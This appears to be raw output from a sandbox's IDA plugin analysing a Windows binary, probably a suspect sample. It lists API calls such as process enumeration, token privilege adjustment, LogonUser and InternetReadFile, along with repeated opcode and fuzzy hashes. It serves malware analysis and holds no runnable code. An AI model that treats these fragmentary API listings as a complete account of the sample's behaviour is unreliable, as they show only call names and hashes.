                                                            • Instruction Fuzzy Hash: 0BA13B71104205AFD700EF54C891EAFB7E8FF99354F00491DF6959B2A2EB71EA09CB62
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CD4AD0), ref: 00CD4B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CD4B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: ee6368a80075a886a7bf78f54d0a9552cc095a2fe68289d9908a1564b44d5de1
                                                            • Instruction ID: 79791f4b67e5ae848a4cf648255879e81c756f00cbd76051654b0db15f2808d3
                                                            • Opcode Fuzzy Hash: ee6368a80075a886a7bf78f54d0a9552cc095a2fe68289d9908a1564b44d5de1
                                                            • Instruction Fuzzy Hash: 30D01235A10B13DFDB209F31D818F0676D4AF15352B11883B9DD5DE250E670D484C664
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: 0b5ad6921c144053b650332fcc1eb1d795219a191aa9108df12c5c195c26cbc8
                                                            • Instruction ID: 45fd67d32297b126a42309144ce0d743108d74061c10204032fd42462c3825ae
                                                            • Opcode Fuzzy Hash: 0b5ad6921c144053b650332fcc1eb1d795219a191aa9108df12c5c195c26cbc8
                                                            • Instruction Fuzzy Hash: F222BB716083809FC724DF25D881BAEB7E4EF84714F14492DF99A97391DB30EA45CBA2
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00D4EE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00D4EE4B
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00D4EF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00D4EF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 51e71e4f8001f84f4b7323ea2aad348b844837697559e357ec2ff701a93c0e1c
                                                            • Instruction ID: c191d7a5d5f7ad79d29171de11583dfa67dcb789183ec54fd82653018364cf19
                                                            • Opcode Fuzzy Hash: 51e71e4f8001f84f4b7323ea2aad348b844837697559e357ec2ff701a93c0e1c
                                                            • Instruction Fuzzy Hash: 9C517B71504711ABD310EF24DC81E6BB7E8EF94710F00492EFA95962A1EB70A909DBA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID:
                                                            • API String ID: 3964851224-0
                                                            • Opcode ID: 8a4968a66833f04b29bd30b97cf6d3d2f4219e693a563458e35fa5cd22458e84
                                                            • Instruction ID: b7b13f5918c09c6ae57e40d865f7a49b552b2a8faaadd2a5c01a38f907fe3843
                                                            • Opcode Fuzzy Hash: 8a4968a66833f04b29bd30b97cf6d3d2f4219e693a563458e35fa5cd22458e84
                                                            • Instruction Fuzzy Hash: 03927C746083819FD720DF15C480B6AB7E5BF85304F24892DF99A8B352DBB1ED85CB92
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D2E628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: ea29e2162d1ec0ed9bc009ba6c528713817c2659b9b8edd35f1a1cb406f30b38
                                                            • Instruction ID: c9ed19919807e8c7d49ad78d13d81757f599228a1f2dc0079d8293fc6aaed030
                                                            • Opcode Fuzzy Hash: ea29e2162d1ec0ed9bc009ba6c528713817c2659b9b8edd35f1a1cb406f30b38
                                                            • Instruction Fuzzy Hash: 39324575A007159FDB28CF19D480AAAB7F0FF58324B15C46EE89ADB3A1E770E941CB50
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00D4180A,00000000), ref: 00D423E1
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00D42418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: 398bb6be84c4854e11ef959e1308a358a6da032367479f64aa1e3afb356e0b7a
                                                            • Instruction ID: c6a358d8c1b779b7d509ebfb41270a3387f996f180c0b0ededf325d6417ecc1b
                                                            • Opcode Fuzzy Hash: 398bb6be84c4854e11ef959e1308a358a6da032367479f64aa1e3afb356e0b7a
                                                            • Instruction Fuzzy Hash: 87410371900309BFEB109E95DC85EBBB7BCEB40714F54402EFA84A6241DAB4DE41A670
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3B40B
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D3B465
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00D3B4B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: a4a248d6d4cb62772ca0d692ecc3efda609e817c0b39b71c5b611bc6cb34eb75
                                                            • Instruction ID: 353bf8d530ab23c499a490baf11226a540ef9c605ec9d20776b1c7f7dae4ed37
                                                            • Opcode Fuzzy Hash: a4a248d6d4cb62772ca0d692ecc3efda609e817c0b39b71c5b611bc6cb34eb75
                                                            • Instruction Fuzzy Hash: 55215E35A00608EFCB00EFA5D880AEDBBB8FF49314F1480AAE945EB351CB319915DB60
                                                            APIs
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D2882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D28858
                                                            • GetLastError.KERNEL32 ref: 00D28865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: e32cbd6a63f78e7d0aaf7c21511ad1d4d8e792ba81e8b8aae3b8ab5dde9e8922
                                                            • Instruction ID: ede6863fcb86c5964aa1c9d9b13df947aaed687db271c589ef9416136d49e940
                                                            • Opcode Fuzzy Hash: e32cbd6a63f78e7d0aaf7c21511ad1d4d8e792ba81e8b8aae3b8ab5dde9e8922
                                                            • Instruction Fuzzy Hash: 28118FB2814304AFE728DFA4EC85D6BB7F8EB44715B24852EF45597241EB30BC409B70
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D28774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D2878B
                                                            • FreeSid.ADVAPI32(?), ref: 00D2879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 3900664feb3f5e7e8aedaecc452a9e84e2697ff40174d5dc8e46c518fefc421a
                                                            • Instruction ID: 32bfdd6649fed450519dca9695a3728552498377bda86155aec916f90c15ccaf
                                                            • Opcode Fuzzy Hash: 3900664feb3f5e7e8aedaecc452a9e84e2697ff40174d5dc8e46c518fefc421a
                                                            • Instruction Fuzzy Hash: 73F0627591130CBFDF00DFF4DC89ABEB7BCEF08211F1044A9A901E6281D7715A048B60
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D3C6FB
                                                            • FindClose.KERNEL32(00000000), ref: 00D3C72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 88289ee3bd3eca67e44c02eb07aa014beaf7a43e87e186df489be26537b59700
                                                            • Instruction ID: 573462e19861e2f10f895d4c71be4c3aa083b7c12bf1f0c4368c3d78f7e4f5c1
                                                            • Opcode Fuzzy Hash: 88289ee3bd3eca67e44c02eb07aa014beaf7a43e87e186df489be26537b59700
                                                            • Instruction Fuzzy Hash: C4118E766002009FDB10EF29D845A2AF7E8EF85325F00851EF9A9DB3A0DB30E801DB91
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00D49468,?,00D5FB84,?), ref: 00D3A097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00D49468,?,00D5FB84,?), ref: 00D3A0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 319448ae030d4dab0a96c71f84d3540ee0b55d9df07446e2637a64b9620ce2bb
                                                            • Instruction ID: 7c819c11723a427b4d4912e5a0bcc2f590292c0dd4315c0048012e2c8113035f
                                                            • Opcode Fuzzy Hash: 319448ae030d4dab0a96c71f84d3540ee0b55d9df07446e2637a64b9620ce2bb
                                                            • Instruction Fuzzy Hash: 20F05E3520532DABDB61AFA4DC48FEA776DAF08361F004266F959D6281D6309940CBB1
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D28309), ref: 00D281E0
                                                            • CloseHandle.KERNEL32(?,?,00D28309), ref: 00D281F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: b0acfa50a6474f1640a81525fe219c185f81b27d82a78ff44d21e310d2c0cb78
                                                            • Instruction ID: a59c64359380b4184eedd4849eee9a3115ed49d9ea5578baa8b843d143461301
                                                            • Opcode Fuzzy Hash: b0acfa50a6474f1640a81525fe219c185f81b27d82a78ff44d21e310d2c0cb78
                                                            • Instruction Fuzzy Hash: B8E0E671011710AFF7652B64FC05D7777E9EF04355724882DF9A5C4471DB616C91EB20
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CF8D57,?,?,?,00000001), ref: 00CFA15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CFA163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 52877a3b476b363a6d39702562c05ec9cb1c2ff0dfda734a41cbaf2a21ae81e2
                                                            • Instruction ID: ba57e808cb314597bb9937e8ac37de7166c92ade7417536052f051cd590c74e9
                                                            • Opcode Fuzzy Hash: 52877a3b476b363a6d39702562c05ec9cb1c2ff0dfda734a41cbaf2a21ae81e2
                                                            • Instruction Fuzzy Hash: E9B09231054308ABFA002F91ED09B893F68EB44AA3F404020FA0DC8270CB6254508AA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79639e8f5eb0114a72b7022e7456d00511684713379d6e8b221634ddbd5bde23
                                                            • Instruction ID: 64a89001a514d8abcd916abb48f38df1cb93c9244d46245bb4c477f517716036
                                                            • Opcode Fuzzy Hash: 79639e8f5eb0114a72b7022e7456d00511684713379d6e8b221634ddbd5bde23
                                                            • Instruction Fuzzy Hash: B0321521D29F094DD7639638D832335A248EFB73C8F15D73BF829B5AA5EB68C5834121
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d82674341a5229c6a337dacb2208c3254582e813062e2d73fc2ac0bdaa0a744
                                                            • Instruction ID: b2dabc9730be84144ee6038f580a150676b27e5cf88c64912f6f864efd90e06b
                                                            • Opcode Fuzzy Hash: 9d82674341a5229c6a337dacb2208c3254582e813062e2d73fc2ac0bdaa0a744
                                                            • Instruction Fuzzy Hash: 44B12120D2AF404DD32396398835336B74CAFBB2C5F51D71BFC6AB4E62EB6285834561
                                                            APIs
                                                            • __time64.LIBCMT ref: 00D3889B
                                                              • Part of subcall function 00CF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D38F6E,00000000,?,?,?,?,00D3911F,00000000,?), ref: 00CF5213
                                                              • Part of subcall function 00CF520A: __aulldiv.LIBCMT ref: 00CF5233
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID:
                                                            • API String ID: 2893107130-0
                                                            • Opcode ID: 5b28322e17495ebb1d53a3ae139297c899ea213ee9aa954b856897e6c58d11d4
                                                            • Instruction ID: 23961405e3ae5ad99e00106e11c703874ea7a54a247815748d73f703e72595d3
                                                            • Opcode Fuzzy Hash: 5b28322e17495ebb1d53a3ae139297c899ea213ee9aa954b856897e6c58d11d4
                                                            • Instruction Fuzzy Hash: 8521D232625610CBC729CF25E841A52B3E1EBA4310F298E2CE1F5CB2D0CA34A905DB64
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00D34C76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 3ccfae428ee081abba2ebf72ea6405826155ce43d35c39c096ac17ba7f18e4c6
                                                            • Instruction ID: f0e126d0edd96c1db73deb89cff14c5144ccddf98b7525124674701f990ff38e
                                                            • Opcode Fuzzy Hash: 3ccfae428ee081abba2ebf72ea6405826155ce43d35c39c096ac17ba7f18e4c6
                                                            • Instruction Fuzzy Hash: E6D09EA416271979EC2807209E5BFBA1109F3807B1F9CA54A7281D91C1E8DCBC40E035
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D28389), ref: 00D287D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: a471f78c35882756f0c8443011d19b6e1d754e5de392fe07d8c406a0dc4d09db
                                                            • Instruction ID: 87e581804bef632b80d2b70fbcebd655cf357810cb2d0db0e45b0e868cfd210b
                                                            • Opcode Fuzzy Hash: a471f78c35882756f0c8443011d19b6e1d754e5de392fe07d8c406a0dc4d09db
                                                            • Instruction Fuzzy Hash: 8FD05E3226060EABEF018FA8DC01EAE3B69EB04B01F408111FE15C51A1C775D835AB60
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CFA12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
